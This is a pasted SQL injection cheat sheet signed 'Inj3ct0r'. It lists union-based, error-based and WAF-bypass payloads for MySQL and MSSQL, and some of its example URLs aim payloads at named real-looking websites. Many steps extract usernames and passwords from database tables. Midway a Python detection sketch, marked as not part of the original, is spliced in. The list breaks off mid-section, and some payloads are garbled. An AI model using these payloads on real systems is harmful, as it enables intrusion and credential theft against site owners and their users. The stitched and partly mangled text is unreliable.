
Bypass

  1.  
  2.  
  3. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4. ~~~~~~~~~~~~~~~~~~~~~~~~~~~:::::Injected By Inj3ct0r:::::~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6.  
  7.  
  8. ------------------------------------ ***Basic "and=0" form:
  9. **Vulnerable column : id=123 and=0 UNION SELECT 1,2-- -
  10. Get table, column, data as usual, adding "and=0" after the id.
  11. ---------------------------------------------------------------------------
  12. ***********/*!Union*/ /*!Select*/ form:
  13.  
  14. **Find the vulnerable column : victim link+null(-null,-id) /*!Union*/ /*!Select*/ 1,2,3...-- - **Get database : victim link+ /*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!table_name*/) from information_schema./*!tables*/ where table_schema=database()-- -
  15. **Get column : victim link +/*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!column_name*/) 4,5... from information_schema./*!columns*/ where /*!table_name*/=0x+hex code of the table-- -
  16. **Get data : victim link +/*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!column name,0x7c,column name,0x7c,column name,0x7c*/) from table name-- -
  17. -----------------------------------------------------------------
  18. **********Advanced bypass, /*!Union*/ /*!Select*/ form, hidden type:
  19.  
  20.  
  21. ***Vulnerable column : id=-... /*!Union*/ /*!Select*/ 1,2,3...-- -
  22. ***Get database :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!table_name*/))),3 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -
  23. ***Get table :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!table_name*/))),3 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -
  24. ***Get column:id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!column_name*/))),3 from information_schema./*!columns*/ where /*!table_name*/=0x...()-- -
  25. ***Get data :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!column name,0x7c,column name,0x7c*/))),3 from table -- -
  26. ----------------------------------------------------------------
  27. ***************Bypass form for blocked "=" + hidden :
  28.  
  29.  
  30. ***Vulnerable column :id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,3,4-- -
  31. ***Get database:id=-..../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000table_name*/))),4 from information_schema. /*!50000tables*/ where /*!50000table_schema*/+like+database()-- -
  32. ***Get column:id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000column_name*/))),4 from information_schema. /*!50000columns*/ where /*!50000table_name*/+like+0x...()-- -
  33. ***Get Data :id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000column name,0x7c,column name,0x7c*/))),4 from table-- -
  34. -----------------------------------------------------------------------
  35. ********************403 bypass form with limit ***(Hard)
  36.  
  37.  
  38. +++Vulnerable column :id=-1'+/*!50000union+select*/+1,2,3,4 -- -
  39. +++Get table:id=-1'+/*!50000union+select*/+1,2,3,concat_ws(0x7c,table_name)+from+information_schema.tables+where+table_schema=database()+limit+1,1-- - (To get more tables, increase the limit: 1,1 - 2,1 - 3,1...)
  40. +++Get column:id=-1'+/*!50000union+select*/+1,2,3,concat_ws(0x7c,column_name)+from+information_schema.columns+where+table_name=0x...+limit+1,1-- -(Increase the limit)
  41. +++Get data :id=-1'+/*!50000union+select*/+1,2,3,concat_ws(0x7c,column name,column name)+from+table name -- -
  42. --------------------------------------------------------------------------------------------
  43. ----------------------------------Bypass 403 limit ****(extremely hard)*****
  44. ***Find the vulnerable column :id=-1+/*!50000union+select*/+1,2,3-- -
  45. ***Get table:id=-1+/*!50000union+select*/+1,2,unhex(hex(concat_ws/*!(0x7c,table_name)))+from+/*!information_schema*/.tables+where+table_schema=database()+limit+0,1-- -
  46. ***Get column:id=-1+/*!50000union+select*/+1,2,unhex(hex(concat_ws/*!(0x7c,column_name)))+from+/*!information_schema*/.columns+where+table_name=0x...+limit+0,1-- -
  47. ***Get data:id=-1+/*!50000union+select*/+1,2,unhex(hex(concat_ws/*!(0x7c,column name,column name))*/)+from+table name-- -
  48. -------------------------------------------------------------------------
  49. ****Hard filter bypass (1 column or many columns) :
  50. ***Get table :id=-1 Union Select group_concat(table_name) FrOm infOrMation_schema.tables
  51. ***Get Column :id=-1 Union Select group_concat(column_name) FrOm infOrMation_schema.tables where table_name=0x...-- -
  52. Get Data:id=-1 Union Select group_concat(column name,0x7c,column name,0x7c) FrOm table name-- -
  53. ------------------------------------------------------------------------
  54. If id=-1 order by ....-- - does not reveal the vulnerable column, change it to id=1' order by
  55. - then exploit as usual.
  56. ~~~>If you cannot get the table, use id=-1' .... then exploit as usual.
  57.  
  58. ***************Hidden table form (UnIoN SeLeCT):
  59. **Vulnerable column : id=-... UNION SELECT 1,2,3,...-- -
  60. **Get Database :id=-... UNION SELECT 1,2,database(),4,...-- - (Put database() in the vulnerable column).
  61. **Get Table :id=-... UNION SELECT 1,2,unhex(hex(group_concat(table_name))),3,4,... from information_schema.tables where table_schema=database()-- -(Add unhex(hex if the table is hidden)
  62. **Get column :id=-... UNION SELECT 1,2,unhex(hex(group_concat(column_name))),4,5,... from information_schema.columns where table_name=0x hex code of the table-- -
  63. **Get data :id=-... UNION SELECT 1,2,unhex(hex(group_concat(column name,0x7c,column name,0x7c,column name))),4,5,6,7,8,9,10,11,12,13 from table name-- -
  64. -----------------------------------------
  65. ****************XPath Injection (error based) :
  66. 1.and extractvalue(rand(),concat(0x7c,version(),0x7c,database(),0x7c,user()))-- -
  67. 2.and extractvalue(rand(),concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))-- -
  68. 3.and extractvalue(rand(),concat(0x7c,(select concat(0x7c,column_name) from information_schema.columns where table_name=0x"table" limit 0,1)))-- -
  69. 4.and extractvalue(rand(),concat(0x7c,(select concat("column",0x7c,"column") from "table" limit 0,1)))-- -
  70. -------------------------------------------
  71. ***XPath bypass form (Hard)
  72. 1.' and extractvalue(rand(),concat/*!(0x7c,version(),0x7c,database(),0x7c,user())*/)-- - 2.' and extractvalue(rand(),concat/*!(*/0x7c,(select concat/*!(0x7c,table_name) from /*!information_schema*/.tables where table_schema=database() limit 0,1)))-- -
  73. 3.'and extractvalue(rand(),concat/*!(*/0x7c,(select concat/*!(0x7c,column_name) from /*!information_schema*/.columns where table_name=0x"table" limit 0,1)))-- -
  74. 4.'and extractvalue(rand(),concat/*!(*/0x7c,(select concat/*!("column",0x7c,"column") from "table" limit 0,1))*/)-- -
  75. -----------------------------------------
  76. *****************XPath Injection (error based, advanced)
  77. 1.or 1 group by concat(0x2f,version(),0x2f,database(),0x2f,user(),0x2f,floor(rand(0)*2)) having min(1) or 1-- -
  78. 2.and updatexml(0,concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)),0)-- -
  79. 3.and updatexml(0,concat(0x7c,(select concat(0x7c,column_name) from information_schema.columns WHERE table_name=0x... limit 0,1)),0)-- -
  80. 4.and updatexml(0,concat(0x7c,(select concat(email,0x7c,password) from table name limit 0,1)),0)-- -
  81. ---------------------------------------------
  82. ++Exploiting SQL = Error Based
  83. http://demo-tainguyen.blogspot.com/…/khai-thac-error-based-…
  84. ++Exploiting Blind SQL :
  85. http://ceh.vn/@4rum/showthread.php?tid=1203
  86. ++ SQLi in a search form (depends on the site)
  87. 'and p.published =-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -
  88. 'and p.published =-1 UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables where table_schema=database()-- -
  89. 'and p.published =-1 UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where table_name=0x62635f7573657273-- -
  90. 'and p.published =-1 UNION SELECT 1,unhex(hex(group_concat(username,0x2f,password))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from bc_users-- -
  91. Source : copy
  92.  
  93.  
  94.  
  95.  
  96.  
  97.  
  98.  
  99.  
  100.  
  101. + SQL Basic
  102. + SQL ASPX
  103. -------------------------------------------------------------
  104. * Exploiting basic SQL errors
  105. + Step 1: order by 100-- -
  106. + Step 2: union select 1,2,3,4,5,6,7,8,9,10-- -
  107. + Step 3: union select 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables-- -
  108. Rules: you can use the Unhex(hex statement
  109. =>>Step 3: union select 1,2,3,unhex(hex(group_concat(table_name))),5,6,7,8 ,9 from information_schema.tables-- -
  110. + Step 4: union select 1,2,3,group_concat(column_name),5,6,7,8,9 from information_schema.columns where table_schema=database()--
  111. + Step 5: union select 1,2,3,group_concat(column_name),5,6,7,,8,9 from information_schema.columns where table_schema=database() and table_name=0x... -- -
  112. Note: the "..." is the table name encoded as hex
  113. =>> yields username and password
  114. + Step 6: union select 1,2,3,group_concat(username,0x20,password,0x20),5, 6,7,8,9 from table_name
  115. --------------------- The End Check Site SQL Basic --------------------
  116. * Exploiting SQL errors on ASPX
  117. + Step 1: and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -
  118. + Step 2: and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_DangNhap')-- -
  119. < not in (.....)-- -> keep extending the statement to list the tables: whenever you obtain a "tbl", add that "tbl" to the list so the check returns the next "tbl"
  120. + Step 3: and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') ))-- -
  121. =>> yields the 'ID' value; next
  122. and 1=convert(int,(select top 1 column name from information_schema.columns where table_name=('tbl_DangNhap') and column_name not in('ID') ))-- -
  123. yields the 'username' value; next
  124. and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') and column_name not in ('ID'),'username') ))-- -
  125. yields the password value
  126. + Step 4: Extract the username and password:
  127. username:
  128. and 1=convert(int,(select top 1 username from tbl_DangNhap))-- -
  129. password:
  130. and 1=convert(int,select top 1 password from tbl_DangNhap))-- -
  131.  
  132.  
  133.  
  134.  
  135.  
  136.  
  137.  
  138.  
  139.  
  140. SQLi Injection WAF Bypass Methods With Details
  141. --'- : +--+ / : -- - : --+- : /*
  142. ) order by 1-- -
  143. ') order by 1-- -
  144.  
  145. ')order by 1%23%23
  146.  
  147. %')order by 1%23%23
  148.  
  149. Null' order by 100--+
  150.  
  151. Null' order by 9999--+
  152.  
  153. ')group by 99-- -
  154.  
  155. 'group by 119449-- -
  156.  
  157. 'group/**/by/**/99%23%23
  158.  
  159. union select ByPassing method
  160.  
  161. +union+distinct+select+
  162.  
  163. +union+distinctROW+select+
  164.  
  165. /**//*!12345UNION SELECT*//**/
  166.  
  167. /**//*!50000UNION SELECT*//**/
  168.  
  169. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  170.  
  171. +/*!u%6eion*/+/*!se%6cect*/+
  172.  
  173. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  174.  
  175. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
  176.  
  177. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  178.  
  179. union /*!50000%53elect*/
  180.  
  181. %55nion %53elect
  182.  
  183. +--+Union+--+Select+--+
  184.  
  185. +UnIoN/*&a=*/SeLeCT/*&a=*/
  186.  
  187. id=1+’UnI”On’+'SeL”ECT’
  188.  
  189. id=1+'UnI'||'on'+SeLeCT'
  190.  
  191. UnIoN SeLeCt CoNcAt(version())--
  192.  
  193. uNiOn aLl sElEcT
  194.  
  195. uUNIONnion all sSELECTelect
  196.  
  197. ===================================================================================================================================
  198. :: Buffer Overflow ::
  199. ===================================================================================================================================
  200. +And(select 1)=(select 0×414)+union+select+1–
  201.  
  202. +And(select 1)=(select 0xAAAA)+union+select+1–
  203.  
  204. +And(select 1)=(select 0×
  205.  
  206. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  207.  
  208. ==================================================================================================================================
  209. :: 400 Bad Request ::
  210. ==================================================================================================================================
  211. –+%0A
  212.  
  213. union+select+1–+%0A,2–+%0A,3–+%0A,4–+%0A,5–+%0A –
  214.  
  215. ==================================================================================================================================
  216. null the parameter
  217. ==================================================================================================================================
  218. id=-1
  219.  
  220. id=null
  221.  
  222. id=1+and+false+
  223.  
  224. id=9999
  225.  
  226. id=1 and 0
  227.  
  228. id==1
  229.  
  230. id=(-1)
  231.  
  232. =======================================================================================================================================
  233. Group_Concat
  234. =======================================================================================================================================
  235. Group_Concat
  236.  
  237. group_concat()
  238.  
  239. /*!group_concat*/()
  240.  
  241. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  242.  
  243. group_concat(,0x3c62723e)
  244.  
  245. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
  246.  
  247. CoNcAt()
  248.  
  249. CONCAT(DISTINCT Version())
  250.  
  251. concat(,0x3a,)
  252.  
  253. concat%00()
  254.  
  255. %00CoNcAt()
  256.  
  257. /*!50000cOnCat*/(/*!Version()*/)
  258.  
  259. /*!50000cOnCat*/
  260.  
  261. /**//*!12345cOnCat*/(,0x3a,)
  262.  
  263. concat_ws()
  264.  
  265. concat(0x3a,,0x3c62723e)
  266.  
  267. /*!concat_ws(0x3a,)*/
  268.  
  269. concat_ws(0x3a3a3a,version()
  270.  
  271. CONCAT_WS(CHAR(32,58,32),version(),)
  272.  
  273. REVERSE(tacnoc)
  274.  
  275. binary(version())
  276.  
  277. uncompress(compress(version()))
  278.  
  279. aes_decrypt(aes_encrypt(version(),1),1)
  280.  
  281. ====================================================================================================================================
  282. To make the column number appear in the page, put after id
  283. ====================================================================================================================================
  284. id=1+and+1=0+union+select+1,2,3,4,5,6
  285.  
  286. +AND+1=0
  287.  
  288. /*!aND*/ 1 like 0
  289.  
  290. +/*!and*/+1=0
  291.  
  292. +and+2>3+
  293.  
  294. +and(1)=(0)
  295.  
  296. and (1)!=(0)
  297.  
  298. +div+0
  299.  
  300. Having+1=0
  301.  
  302. ===================================================================================================================================
  303. function ByPassing
  304. ===================================================================================================================================
  305. unhex(hex(value))
  306.  
  307. cast(value as char)
  308.  
  309. uncompress(compress(version()))
  310.  
  311. cast(version() as char)
  312.  
  313. aes_decrypt(aes_encrypt(version(),1),1)
  314.  
  315. binary(version())
  316.  
  317. convert(value using ascii)
  318.  
  319. ===================================================================================================================================
  320. avoid source page injection
  321. ===================================================================================================================================
  322. concat(?”>,
  323.  
  324. ,@@version,?
  325.  
  326. “>
  327. ?
  328.  
  329. injection
  330.  
  331. concat(0x223e,@@version)
  332.  
  333. concat(0x273e27,version(),0x3c212d2d)
  334.  
  335. concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
  336.  
  337. concat(0x223e,@@version,0x3c696d67207372633d22)
  338.  
  339. concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)
  340.  
  341. concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)
  342.  
  343. concat(‘’,@@version,’’)
  344.  
  345. concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)
  346.  
  347. concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)
  348.  
  349. ===================================================================================================================================
  350. get version – DB_NAME – user – HOST_NAME – datadir
  351. ===================================================================================================================================
  352. version()
  353.  
  354. convert(version() using latin1)
  355.  
  356. unhex(hex(version()))
  357.  
  358. @@GLOBAL.VERSION
  359.  
  360. (substr(@@version,1,1)=5) :: 1 true 0 false
  361.  
  362. # like #
  363.  
  364. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 –
  365.  
  366. ==================================================================================================================================
  367. +and substring(version(),1,1)=4
  368.  
  369. +and substring(version(),1,1)=5
  370.  
  371. +and substring(version(),1,1)=9
  372.  
  373. +and substring(version(),1,1)=10
  374.  
  375. id=1 /*!50094aaaa*/ error
  376.  
  377. id=1 /*!50095aaaa*/ no error
  378.  
  379. id=1 /*!50096aaaa*/ error
  380.  
  381. # like # http://www.marinaplast.com/page.php?id=13 /*!50095aaaa*/
  382.  
  383. id=1 /*!40123 1=1*/–+- no error
  384.  
  385. id=1 /*!40122rrrr*/ no error
  386.  
  387. # like # http://www.marinaplast.com/page.php?id=13 /*!40122rrrr*/ error not v4
  388. =================================================================================================================================
  389. DB_NAME()
  390. =================================================================================================================================
  391. @@database
  392. database()
  393. id=vv()
  394. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,DB_NAME(),4,5 –
  395. http://www.marinaplast.com/page.php?id=vv()
  396. @@user
  397. user()
  398. user_name()
  399. system_user()
  400. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 –
  401.  
  402. HOST_NAME()
  403. @@hostname
  404. @@servername
  405. SERVERPROPERTY()
  406.  
  407. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 –
  408. @@datadir
  409. datadir()
  410. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,datadir(),4,5 –
  411. ASPX
  412. and 1=0/@@version
  413. ‘ and 1=0/@@version;–
  414. ‘) and 1=@@version–
  415. and 1=0/user;–
  416.  
  417. Requested method
  418. [DUMP DB in 1 Request]
  419.  
  420. (select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)
  421.  
  422. (select(@) from (select (@:=0×00),(select (@) from (table) where (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a)
  423. ===================================================================================================================================
  424. [DUMP DB in 1 Request improve]
  425. ===================================================================================================================================
  426.  
  427. (select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)
  428.  
  429. like
  430. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.colu mns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 –
  431. ===================================================================================================================================
  432. #2#
  433. ===================================================================================================================================
  434. method like DUMP DB in 1 Request
  435. ===================================================================================================================================
  436. concat(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT( @o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1)))
  437. like
  438. http://www.mishnetorah.com/shop/details.php…(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT(@o,0xd0a ,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21
  439. ===================================================================================================================================
  440. #3#
  441. ===================================================================================================================================
  442. databases
  443.  
  444. (select+count(schema_name) +from+information_schema.schemata)
  445.  
  446. # like #
  447. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(schema_name) +from+information_schema.schemata),4,5 –
  448.  
  449. tables
  450. (select+count(table_name) +from+information_schema.tables)
  451. # like #
  452. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(table_name) +from+information_schema.tables),4,5 –
  453.  
  454. columns
  455. (select+count(column_name) +from+information_schema.columns)
  456. # like #
  457. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(column_name) +from+information_schema.columns),4,5 –
  458. ===================================================================================================================================
  459. #4#
  460. ===================================================================================================================================
  461. show the table with all its columns
  462.  
  463. CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))
  464.  
  465. +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1–+
  466.  
  467. like
  468. http://www.marinaplast.com/page.php?id=-13 union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)),4,5 +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1–+
  469. ===================================================================================================================================
  470. #5#WWWWWWWWWWWAAAAAAAAAAAAAAAAAAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
  471. ===================================================================================================================================
  472. filtered requests
  473.  
  474. # tables #
  475. group_concat(/*!table_name*/)
  476.  
  477. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– -
  478.  
  479. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– -
  480.  
  481. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()– -
  482. ===================================================================================================================================
  483. # columns #
  484. ===================================================================================================================================
  485. group_concat(/*!column_name*/)
  486.  
  487. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
  488.  
  489. /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  490.  
  491. /*!froM*/ table– -
  492. ===================================================================================================================================
  493. #6#
  494. ===================================================================================================================================
  495. bypass method
  496.  
  497. (select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
  498.  
  499. (select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
  500.  
  501. like
  502. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 –
  503. ===================================================================================================================================
  504. #7#
  505. ===================================================================================================================================
  506. bypass method
  507.  
  508. unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
  509.  
  510. /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
  511.  
  512. like
  513. http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)–
  514.  
  515. ===================================================================================================================================
  516. [+] Union Select:
  517. ===================================================================================================================================
  518. union /*!select*/+
  519. union/**/select/**/
  520. /**/union/**/select/**/
  521. /**/union/*!50000select*/
  522. /**//*!12345UNION SELECT*//**/
  523. /**//*!50000UNION SELECT*//**/
  524. /**/uniUNIONon/**/selSELECTect/**/
  525. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  526. /**//*!union*//**//*!select*//**/
  527. /**/UNunionION/**/SELselectECT/**/
  528. /**//*UnIOn*//**//*SEleCt*//**/
  529. /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  530. /**/UNunionION/**/all/**/SELselectECT/**/
  531. /**//*UnIOn*//**/all/**//*SEleCt*//**/
  532. /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  533. uni
  534. %20union%20/*!select*/%20
  535. union%23aa%0Aselect
  536. union+distinct+select+
  537. union+distinctROW+select+
  538. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  539. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  540. %23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
  541. /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  542. /*!u%6eion*/+/*!se%6cect*/+
  543. 1%’)and(0)union(select(1),version(),3,4,5,6)%23%23%23
  544. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  545. union /*!50000%53elect*/
  546. +%2F**/+Union/*!select*/
  547. %55nion %53elect
  548. +–+Union+–+Select+–+
  549. +UnIoN/*&a=*/SeLeCT/*&a=*/
  550. uNiOn aLl sElEcT
  551. uUNIONnion all sSELECTelect
  552. union(select(1),2,3)
  553. union (select 1111,2222,3333)
  554. union (/*!/**/ SeleCT */ 11)
  555. %0A%09UNION%0CSELECT%10NULL%
  556. /*!union*//*–*//*!all*//*–*//*!select*/
  557. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  558. union+sel%0bect
  559. +uni*on+sel*ect+
  560. +‪#‎1q‬%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
  561. union(select (1),(2),(3),(4),(5))
  562. UNION(SELECT(column)FROM(table))
  563. id=1+’UnI”On’+’SeL”ECT’
  564. id=1+’UnI’||’on’+SeLeCT’
  565. union select 1–+%0A,2–+%0A,3–+%0A etc ….
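
Seen from the detection side, the variants in the list above collapse to the same statement once the input is canonicalized before matching. The sketch below is an added example, not part of the original paste: `inspect`, `Verdict` and the layer names are hypothetical, the samples are fragments quoted from the list above, and it covers only URL encoding, MySQL versioned and inline comments, mixed case and keyword-stripping evasions.

```python
import re
from typing import List, NamedTuple
from urllib.parse import unquote

KEYWORDS = {"union", "select"}
# MySQL executes the body of /*!NNNNN ... */ when the server version is >= NNNNN,
# so the body must be kept, not discarded like an ordinary comment.
VERSIONED = re.compile(r"/\*!(?:\d{5})?(.*?)\*/", re.S)
BLOCK = re.compile(r"/\*.*?\*/", re.S)           # ordinary comment = whitespace
LINE = re.compile(r"(?:#|--(?=\s|$))[^\n]*")     # '#' or '-- ' to end of line
UNION_SELECT = re.compile(
    r"\bunion\b\s*(?:all\b|distinct\b|distinctrow\b)?\s*\(?\s*select\b")
# What a naive filter that deletes keywords once would remove.
STRIPPED = re.compile(r"union|select|all")


class Verdict(NamedTuple):
    canonical: str       # normalized text the signature is matched against
    layers: List[str]    # obfuscation layers that had to be undone
    union_select: bool   # True when a UNION ... SELECT is present


def inspect(raw: str, max_rounds: int = 3) -> Verdict:
    layers: List[str] = []
    text = raw.replace("+", " ")          # '+' is a space in a query string
    for _ in range(max_rounds):           # undo nested percent-encoding
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
        if "url-encoding" not in layers:
            layers.append("url-encoding")
    text = text.replace("\x00", "")       # null bytes used to split tokens
    if VERSIONED.search(text):
        layers.append("versioned-comment")
        text = VERSIONED.sub(r" \1 ", text)
    if BLOCK.search(text):
        layers.append("inline-comment")
        text = BLOCK.sub(" ", text)
    text = LINE.sub(" ", text)
    words = re.findall(r"[A-Za-z]+", text)
    if any(w.lower() in KEYWORDS and w not in (w.lower(), w.upper())
           for w in words):
        layers.append("mixed-case")
    canonical = " ".join(text.split()).lower()
    hit = bool(UNION_SELECT.search(canonical))
    # "uniUNIONon" only becomes "union" after a filter deletes the inner
    # keyword, so simulate that single deletion pass and match again.
    if not hit and UNION_SELECT.search(STRIPPED.sub("", canonical)):
        layers.append("keyword-stripping")
        hit = True
    return Verdict(canonical, layers, hit)


# Fragments quoted from the list above, used here as detection test input.
SAMPLES = [
    "+union+distinctROW+select+",
    "/**//*!50000UNION SELECT*//**/",
    "/*!50000%55nIoN*/+/*!50000%53eLeCt*/",
    "/**/uniUNIONon/**/aALLll/**/selSELECTect/**/",
    "union%23aa%0Aselect",
    "uUNIONnion all sSELECTelect",
    "1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        v = inspect(sample)
        print(f"{v.union_select!s:5} {','.join(v.layers) or '-':45} {v.canonical}")
```

The `layers` field is worth logging alongside the match: a request that needed several layers undone before it matched is a stronger signal than the match alone.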
  566. ===================================================================================================================================
  567. [+] Buffer overflow:
  568. ===================================================================================================================================
  569. +And(select 1)=(select 0×414)+union+select+1–
  570. +And(select 1)=(select 0xAAAA)+union+select+1–
  571. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  572. +and (/*!select*/ 1)=(/*!select*/ 0×414)+
  573. +And(select 1)=(select 0×
  574. ===================================================================================================================================
  575. [+] Group Concat:
  576. ===================================================================================================================================
  577. Group_Concat
  578. group_concat()
  579. /*!group_concat*/()
  580. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  581. group_concat(,0x3c62723e)
  582. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22testtest%22%29
  583. CoNcAt()
  584. CONCAT(DISTINCT Version())
  585. concat(,0x3a,)
  586. concat%00()
  587. %00CoNcAt()
  588. /*!50000cOnCat*/(/*!Version()*/)
  589. /*!50000cOnCat*/
  590. /**//*!12345cOnCat*/(,0x3a,)
  591. concat_ws()
  592. concat(0x3a,,0x3c62723e)
  593. /*!concat_ws(0x3a,)*/
  594. concat_ws(0x3a3a3a,version()
  595. CONCAT_WS(CHAR(32,58,32),version(),)
  596. ===================================================================================================================================
  597. ERROR BASED
  598. ===================================================================================================================================
  599. =21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1–
  600.  
  601. Database
  602.  
  603. 21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  604.  
  605. Table_name
  606.  
